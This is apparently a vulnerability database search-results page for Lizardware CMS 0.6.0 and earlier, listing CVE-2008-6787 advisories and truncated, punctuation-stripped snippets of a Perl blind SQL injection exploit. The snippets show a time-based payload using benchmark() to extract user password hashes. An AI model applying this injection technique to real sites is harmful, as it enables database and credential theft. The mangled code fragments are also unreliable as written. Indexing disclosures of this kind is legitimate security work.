12 matches found
EUVD-2008-6747
Malware in sbrugna...
Lizardware CMS <= 0.6.0 - Blind SQL Injection Exploit
漏洞类型: 输入验证错误 漏洞文件: /administrator/index.php 漏洞成因: 在index.php 中,未对用户输入进行过滤从而导致注入 参考: http://www.securityfocus.com/bid/32898/solution !/usr/bin/perl -w Lizardware CMS = 0.6.0 Blind SQL Injection Exploit by athos - stakerathotmaildotit http://sourceforge.net/projects/lizardwarecms/ use strict; use...
Sql injection
SQL injection vulnerability in administrator/index.php in Lizardware CMS 0.6.0 and earlier allows remote attackers to execute arbitrary SQL commands via the user...
CVE-2008-6787
SQL injection vulnerability in administrator/index.php in Lizardware CMS 0.6.0 and earlier allows remote attackers to execute arbitrary SQL commands via the user...
CVE-2008-6787
SQL injection vulnerability in administrator/index.php in Lizardware CMS 0.6.0 and earlier allows remote attackers to execute arbitrary SQL commands via the user...
CVE-2008-6787
SQL injection vulnerability in administrator/index.php of Lizardware CMS 0.6.0 and earlier allows remote attackers to execute arbitrary SQL via the user parameter. Affected: Lizardware CMS (≤0.6.0); vulnerable component: administrator/index.php; root cause: unsanitized input used in SQL query. Im...
Lizardware CMS 0.6.0 Blind SQL Injection
!/usr/bin/perl -w Lizardware CMS post$host, user = $param, pass = 'anything' ; sub givechar my $send = undef; my $charz,$uidz = @; $send = "' or select ifasciisubstring". "userpassword,$uidz,1=$charz,". "benchmark230000000,char0,". "0 from $ptableusers where userid=$userid"; return $send; for1..3...
Lizardware CMS <= 0.6.0 Blind SQL Injection Exploit
No description provided by source. !/usr/bin/perl -w Lizardware CMS = 0.6.0 Blind SQL Injection Exploit by athos - stakerathotmaildotit http://sourceforge.net/projects/lizardwarecms/ use strict; use LWP::UserAgent; my $stop,$start,$hash; my $domain = shift; my $ptable = shift; my $userid = shift ...
Lizardware CMS <= 0.6.0 Blind SQL Injection Exploit
Exploit for unknown platform in category web applications =================================================== Lizardware CMS post$host, user = $param, pass = 'anything' ; sub givechar my $send = undef; my $charz,$uidz = @; $send = "' or select ifasciisubstring". "userpassword,$uidz,1=$charz,"...
Lizardware CMS 0.6.0 - Blind SQL Injection
!/usr/bin/perl -w Lizardware CMS post$host, user = $param, pass = 'anything' ; sub givechar my $send = undef; my $charz,$uidz = @; $send = "' or select ifasciisubstring". "userpassword,$uidz,1=$charz,". "benchmark230000000,char0,". "0 from $ptableusers where userid=$userid"; return $send; for1..3...
Lizardware CMS 0.6.0 - Blind SQL Injection
Lizardware CMS 0.6.0 - Blind SQL Injection !/usr/bin/perl -w Lizardware CMS post$host, user = $param, pass = 'anything' ; sub givechar my $send = undef; my $charz,$uidz = @; $send = "' or select ifasciisubstring". "userpassword,$uidz,1=$charz,". "benchmark230000000,char0,". "0 from $ptableusers...
lizard-rfi.txt
Lizardware CMS Remote File Inclusion ---------| Download:| ---------|---------------------------------------------------------| http://sourceforge.net/project/platformdownload.php?groupid=183519| -------------------------------------------------------------------| -----------------------| Launche...